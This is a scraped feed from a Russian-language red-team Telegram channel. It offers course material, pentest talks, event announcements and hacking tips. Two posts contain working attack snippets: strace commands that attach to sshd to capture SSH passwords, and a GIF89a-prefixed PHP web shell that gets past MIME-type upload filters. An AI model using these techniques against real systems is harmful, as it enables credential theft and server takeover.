RESOLUTE ATTACK
6.45K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
OSWE FROM @RESOLUTE-ATTACK.pdf
22.1 MB
Учебная программа [OSWE]:

Инструменты и методологии веб-безопасности
Анализ исходного кода
Постоянный межсайтовый скриптинг
Перехват сеанса
Десериализация .NET
Удаленное выполнение кода
Слепые SQL-инъекции
Эксфильтрация данных
Обход ограничений на загрузку файлов и фильтров расширений файлов
Жонглирование типами PHP с помощью свободных сравнений
Расширение PostgreSQL и определяемые пользователем функции
Обход ограничений регулярных выражений
Волшебные хэши
Обход ограничений на символы
Обратные оболочки UDF
Большие объекты PostgreSQL
Межсайтовый скриптинг на основе DOM (черный ящик)
Внедрение шаблона на стороне сервера
Слабая генерация случайных токенов
Слабая генерация случайных токенов
Внедрение внешней сущности XML
RCE через функции базы данных
Внедрение команд операционной системы через WebSockets (черный ящик)

Пароль:
RESOLUTE ATTACK

EAGER7 | SUBSCRIBE

#Курсы
🔥1715👍6😱31😍1
17🔥9🤣6👍32
🦆Rubber Ducky/BadUSB

Недавно в мои руки, наконец, попала такая игрушка как Flipper Zero. Копаясь в функционале, обнаружил там утилиту BadUSB. Сам по себе BadUSB - это вектор атак, суть которого заключается в эмуляции системой работы клавиатуры или выполнения любых операций на ПК жертвы под видом обычного юзера

Читать

#Инструменты #Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
👍167🔥31
⚡️ Внутрянка с точки зрения пентестера
Уже через час🔥

В докладе мы разберём тему:
"Внутрянка с точки зрения пентестера".

Разберем такие моменты как: пассивный анализ трафика, активная разведка, основные атаки на ActiveDirectory, извлечение информации из LDAP, пивотинг

➡️ Спикер: Кирилл Филимонов ( @Curiv )
Канал спикера - https://t.me/pathsecure

Кирилл является специалистом в сфере этичного хакинга. Он уже успел выступить со своими докладами на:
Конференциях OffZone2022, HackConf, PermSecurityMeetup, КодИБ, а также в сообществах Хакердом и DC7342

➡️ https://www.youtube.com/watch?v=BJ-D-f8KU7U

#Тестирование #Внутрянка
Please open Telegram to view this post
VIEW IN TELEGRAM
94🔥4
Последний доклад под эгидой Е7 ;(
😱279
Channel name was changed to «RESOLUTE ATTACK»
Итак, давай мы проясним вам, что происходит.
Мы решили сделать ребрендинг, потому что мы выбрали вектор, по которому будем двигаться - RED TEAM. И хотим быть максимально близки, даже по названию.

💻 RESOLUTE ATTACK - Переводится как решительное нападение. Все права на Е7 остаются по-прежнему у нас, как на логотип, так и на название. Если увидите ещё проекты с нашим прошлым логотипом, знайте - они негодяи.

🌹Что означает чёрная роза в руках?
У чёрной розы множество значений, в нашем же случае значение могущества, отваги и борьбы со страхом.

⚡️ Что будет с дальнейшем контентом? - Будет только лучше, мы растём изо дня в день. Step by step, brother.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍53🔥179🤣32😈2
Призрачный Ethernet & Обход NAC – Практический обзор

Какой бы ни была причина, сокрытие вашей личности в сети на уровне Ethernet дает значительные преимущества при внутренней оценке безопасности.
Одним из практических способов добиться этого является использование метода, который мы любим называть «Ethernet Ghosting», когда законное устройство в сети используется в качестве маски для маскировки связи с устройством злоумышленника.

Читать

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
158👍7🔥7
💻 CTF TIME - Платформа на который публикуются ближайшие CTF ивенты, в которых можно принять участие. Также есть система рейтинга, на которой можно посмотреть лидеров по CTF соревнованиям в мире. Также есть история соревнований. Кибер спорт должен быть таким?

Теперь ветка в нашем чате кибер ивенты будет активно заполняться.

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
15🔥83👍3
⚡️RESOLUTE ATTACK и Anti-Malware.ru теперь официально имеют партнёрские отношения🔥
Предлагаем вам посетить ближайший их ивент

AM Live: Аппаратное обеспечение для российского ИБ
📅14 декабря, СР, 11:00

В прямом эфире обсудим:
🔸Сможет ли рынок информационной безопасности адаптироваться к новой реальности?
🔸Получится ли избежать тотального дефицита оборудования?
🔸 Россия не производит современные микропроцессоры, чипы памяти, СХД и много чего еще. Есть ли шансы это исправить?
🔸Спрос и предложение на аппаратное обеспечение для ИБ

Модератор:
🔸Руслан Иванов, Директор офиса развития инфраструктуры стратегических корпоративных заказчиков «Ростелеком-Солар»

Спикеры:
🔸Павел Коростелев, Руководитель отдела продвижения продуктов «Код Безопасности»
🔸Карина Абагян, Директор по стратегическому развитию
АО "Микрон"
🔸Сергей Плотко, Директор по аналитике и интеграции АО "НПП "Цифровые решения"
🔸Константин Закатов, Руководитель Департамента информационной безопасности ООО «ПК АКВАРИУС»

Принять участие

#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥8👍2
This media is not supported in your browser
VIEW IN TELEGRAM
🤨Команда девелоперов
RESOLUTE ATTACK

Строчит курс PRTT 😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣356👍4
Forwarded from SecuriXy.kz
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd

pgrep -l sshd

2. Отслеживаем системные вызовы

strace -f -p <ssh_PID> -e trace=write -o capture

Ну или одной строкой

strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture


#ssh #sniff #password
18🔥94👍4
😈Scraping директорий на Python

Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.

Читать

#Python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥176👍5
До 9к добъём?
👍34🔥12
🗣Обход загрузки файлов с использованием MIME-типа

Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.

Для этого нам нужно добавить только одну строку в начале нашего скрипта: GIF89a;

GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.

GIF89a;
<?php
system('whoami'); # shellcode goes here
?>

RESOLUTE ATTACK

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6😍3🤣3